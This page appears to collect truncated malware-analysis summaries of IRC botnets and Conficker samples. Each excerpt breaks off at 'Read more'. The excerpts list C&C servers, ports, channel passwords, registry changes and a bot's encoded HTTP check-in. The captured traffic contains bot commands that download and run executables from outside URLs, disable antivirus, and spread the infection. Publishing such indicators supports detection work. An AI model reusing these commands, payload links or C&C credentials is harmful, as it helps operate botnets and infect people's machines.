Author: Pig

Remote Host Port Number 129.7.211.61 7537 Resolved : [xdrone.sytes.net] To [129.7.211.61] NICK carnern SILENCE +*!*@*,~*!*@*undernet.org,~*!*@*.ro MODE hanglyb +iwx NICK harbaughz USER havoc “” “xdrone.sytes.net” :Who’s Peer & why did he reset my connection? MODE #drone NICK :disneyv MODE harbaughz +i USER bowker “” “xdrone.sytes.net” :Press any key to continue or any other key to quit…Read more...

Remote Host Port Number 124.217.229.162 83 PASS letmein NICK [00-USA-XP-3036431] USER SP2-ilm * 0 :COMPUTERNAME Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBootMinimalWM System Decode Application o HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBootNetworkWM System Decode Application o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_SYSDRV32 o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_SYSDRV32000 o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_SYSDRV32000Control o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_WM_SYSTEM_DECODE_APPLICATION o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_WM_SYSTEM_DECODE_APPLICATION000 o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_WM_SYSTEM_DECODE_APPLICATION000Control o HKEY_LOCAL_MACHINESYSTEMControlSet001Servicessysdrv32 o HKEY_LOCAL_MACHINESYSTEMControlSet001Servicessysdrv32Security o HKEY_LOCAL_MACHINESYSTEMControlSet001Servicessysdrv32Enum o HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesWM SystemRead more...

Remote Host Port Number 125.17.135.163 6667 PASS blah NICK fawrqd USER pscebs “” “btj” :pscebs PONG :EF4570FF JOIN #cC-Team x0r PONG :irc.flaw.net Invisible Users: 786 Channels: 14 channels formed Clients: I have 810 clients and 0 servers Local users: Current Local Users: 810 Max: 1185 Global users: Current Global Users: 810 Max: 1052 Registry ModificationsRead more...

3 domains found from this malware and multiple tasks are called from same exe file exe is uploaded by mysterii DNS: verseuable.com: type A, class IN, addr 64.191.16.70 twindu.net: type A, class IN, addr 77.120.109.3 cogiicio.com: type A, class IN, addr 87.255.51.229 HTTP: Data: POST /bu​gatti.ph​p?ini=v2​2Mm2fmTo​X7DzVq7F​BHROc/PO​W6dtZpa4​xZTXQhKB​9UBFbWih​Pdnz2vDF​rHIQqMgM​qV7MpGeg​iBMF4YGm​LzfIyRtu​fQpaX/NP​tque7okw​== HTTP/​1.1 RAW: ..’.?…​’..K..E.​.-.R@…​^…o.@.​.F.O.PQ.​.2….P.​……PO​ST /buga​tti.php?​ini=v22M​m2fmToX7​DzVq7FBH​ROc/POW6​dtZpa4xZ​TXQhKB9U​BFbWihPd​nz2vDFrH​IQqMgMqV​7MpGegiB​MF4YGmLz​fIyRtufQ​paX/NPtq​ue7okw==​ HTTP/1.​1..Conte​nt-Type:​applicat​ion/x-ww​w-form-u​rlencode​d..Host:​ verseua​ble.com.​.User-Ag​ent: Moz​illa/6.0​ (Window​s; wget3​.0)..Con​tent-Len​gth:Read more...

Remote Host Port Number 70.38.98.239 80 92.243.24.240 5900 PASS Virus NICK VirUs-sgvyxgjf USER VirUs “” “dah” : 8Coded 8VirUs.. JOIN #THeRaNdOm4# Virus PRIVMSG #THeRaNdOm4# :Success. PONG :OGARD.EDUCATIONAL.Gov Now talking in #THeRaNdOm4# Topic On: [ #THeRaNdOm4# 12] [ !NAZELlol http://img105.herosh.com/2010/11/11/555028723.gif Hajni12.exe 1 ] Topic By: [ Somebody ] tux.shannen.cc 92.243.24.240 0 127.0.0.1 fastwebinfo.com fastwebinfo.com 66.96.217.24 promoup.infoRead more...

nice.niceshot.in 67.202.108.14 C&C Server: 67.202.108.14:6567 Server Password: Username: XP-5109 Nickname: [SI|DEU|00|P|07356] Channel: #update# (Password: c1rc0dus0leil) Channeltopic: :.updbin http://www.ahava.lt/ali.exe Username: XP-1820 Nickname: [SI|DEU|00|P|47468] Channel: #cricri# (Password: c1rc0dus0leil) Channeltopic: nice.niceshot.in 67.202.108.130 C&C Server: 67.202.108.130:6567 Server Password: Username: XP-3473 Nickname: [SI|DEU|00|P|06553] Channel: #csm# (Password: c1rc0dus0leil) Channeltopic: :.austinupdate http://www.minka.com.pe/wp-includes/js/crap.exe MODE [SI|USA|00|P|82252] -ix JOIN #perurlz# c1rc0dus0leil PRIVMSG #perurlz# :[Dl]: FileRead more...

tep.xylocomod.com 66.96.240.101 Remote Host Port Number 66.96.240.101 9009 NICK n{USA|XP}430851 USER 4308 “” “TsGh” :4308 JOIN ##kuwait## 112211 PRIVMSG ##kuwait## :New Infection! Ganja 2.2 Executed! Now talking in ##kuwait## Topic On: [ ##kuwait## ] [ !dl http://fagermoshreq.100free.com/win win.exe 1 | !av.kill | !clean ] Topic By: [ X ] Other details * The following portRead more...

package contains 20 mb executable files from diferent versions of conficker litle informacion about conficker variants: C:Documents and SettingsAdministratorMy DocumentsDownloadslast122830b424d88664cc3576941dd9841f9 – Win32/Conficker.AA worm C:Documents and SettingsAdministratorMy DocumentsDownloadslast124199a5b981fd5a3d846d3f9d4c1d574 – Win32/Conficker.AA worm C:Documents and SettingsAdministratorMy DocumentsDownloadslast1260722ac0e512e73f6c16ebe87229bea – a variant of Win32/Conficker.X worm C:Documents and SettingsAdministratorMy DocumentsDownloadslast12656e272e85a25caaece4591e24b4d35 – a variant of Win32/Conficker.X worm C:Documents and SettingsAdministratorMy DocumentsDownloadslast12724c68f973e4e35391849cfb5259f86 –Read more...

irc.estuchat.org ip: 208.98.62.222 irc.estuchat.org ip: 64.32.19.46 irc.estuchat.org ip: 64.32.19.10 irc.estuchat.org:6667 NICK: WXP|USA|84|5456 USER: USA REALNAME:DESKTOP CHANNEL:### with password: m3l4m3 CHANNEL LOG:#error m3l4m3 .facebook HOST pICS : http://111.90.148.79/_vti_html/svv.exe pks.pks.pks.pks .cambiar http://111.90.148.79/_vti_html/svv.exe m3l4m3 .login mutual m3l4m3 .cambiar http://111.90.148.79/_vti_html/svv.exe m3l4m3 .login olidata m3l4m3 .cambiar http://111.90.148.79/_vti_html/svv.exe m3l4m3 .login xxx123 m3l4m3 .cambiar http://111.90.148.79/_vti_html/svv.exe m3l4m3 .spread WXP|USA|13|8698 is United@CYIFJx.CmxkT8.vIPv4 * *Read more...

bean.F-QACS.INFO DNS_TYPE_A 178.162.175.51 Resolved : [bean.f-qacs.info] To [205.186.156.104] Resolved : [bean.F-QACS.INFO] To [188.72.241.56] Resolved : [bean.f-qacs.info] To [178.162.175.51] 178.162.175.51:5337 Nick: [^][XP-SP3]-[AUT]-494912 Username: s Joined Channel: #!nish with Password hacken Channel Topic for Channel #!nish: “!dll http://dl.dropbox.com/u/9257409/m8n2.exe m8n2.exe 1” 178.162.175.51:5337 Nick: {iNF-00-USA-XP-pc2-7174} Username: blaze Joined Channel: #!m82 with Password error Channel Topic for Channel #!m82: “.aScRead more...